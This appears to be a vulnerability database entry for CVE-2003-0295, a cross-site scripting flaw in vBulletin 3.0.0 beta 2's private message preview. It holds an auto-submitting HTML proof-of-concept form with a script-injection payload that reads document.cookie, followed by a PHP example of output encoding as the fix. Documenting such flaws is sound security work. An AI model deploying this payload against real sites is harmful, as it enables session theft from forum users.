vBulletin private.php Cross-Site Scripting Vulnerability

Vulnerability ID: 1107326    Vulnerability type: Cross-site scripting
Published: 2003-05-14    Updated: 2003-06-16
CVE ID: CVE-2003-0295
CNNVD-ID: CNNVD-200306-086
Platform: PHP    CVSS score: 6.8
|Vulnerability Source
https://www.exploit-db.com/exploits/22599
https://www.securityfocus.com/bid/82835
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-086
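|Vulnerability Details
A cross-site scripting (XSS) vulnerability exists in private.php in vBulletin 3.0.0 beta 2. Remote attackers can inject arbitrary web script and HTML via the "Preview Message" feature.
|Exploit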
source: http://www.securityfocus.com/bid/7594/info

A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message.

It should be noted that vBulletin 3.0.0 beta 2 is not a public release and has only been made available to a small portion of selected sites. This issue does not affect any public releases of vBulletin. 

<html>
<body>
 <form action="http://[victim]/forum/private.php" method="post"
name="vbform">
  <input type="hidden" name="do" value="insertpm" />
  <input type="hidden" name="pmid" value="" />
  <input type="hidden" name="forward" value="" />
  <input type="hidden" name="receipt" value="0" />

  <input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
  <textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
  <input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
  <input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

  <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
  <input type="checkbox" name="signature" value="1" id="cb_signature" />
  <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
  <input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
 </form>
<script>
 //Set Values and Submit
 // You can write your own JS codes
 var xss = "\"><script>alert(document.cookie)<\/script>";
 document.vbform.title.value=xss;
 document.vbform.preview.click();
</script>
</body>
</html>
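
The mitigation for the issue shown above, as an added example that is not vBulletin's code and not part of the original advisory. The function names and the single-input template are hypothetical, and it assumes the title is reflected into an input's value attribute, which is the context the leading `">` of the PoC value is shaped for.

```php
<?php
// Added example: hypothetical preview renderer, not vBulletin source code.
// Assumption: the PM title is echoed into an <input value="..."> attribute,
// the context that the leading `">` of the PoC value is shaped for.

function render_title_unsafe(string $title): string
{
    // Vulnerable pattern: request data concatenated into markup as-is.
    return '<input type="text" name="title" value="' . $title . '" />';
}

function render_title_safe(string $title): string
{
    // ENT_QUOTES encodes " and ', so the value cannot close the attribute;
    // < and > are encoded as well, so it cannot open a new tag.
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '" />';
}

function parse_fragment(string $html): DOMDocument
{
    // Parse the rendered markup so the check is on the resulting DOM,
    // not on a string match.
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true);
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc;
}

// Constructed sample input, same shape as the title value set in the PoC.
$title = '"><script>alert(document.cookie)</script>';

foreach (['render_title_unsafe', 'render_title_safe'] as $render) {
    $doc = parse_fragment($render($title));
    $scripts = $doc->getElementsByTagName('script')->length;
    $value = $doc->getElementsByTagName('input')->item(0)->getAttribute('value');
    printf("%-20s script elements: %d, title preserved: %s\n",
        $render, $scripts, $value === $title ? 'yes' : 'no');
}
```

Run it with the PHP CLI; it needs the dom extension.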
|Affected Products
Jelsoft vBulletin 3.0.0 Beta 2
|References

Source: BUGTRAQ
Name: 20030514 VBulletin Preview Message - XSS Vuln
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105292832607981&w=2
Source: BUGTRAQ
Name: 20030514 Re: VBulletin Preview Message - XSS Vuln
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=105293890422210&w=2
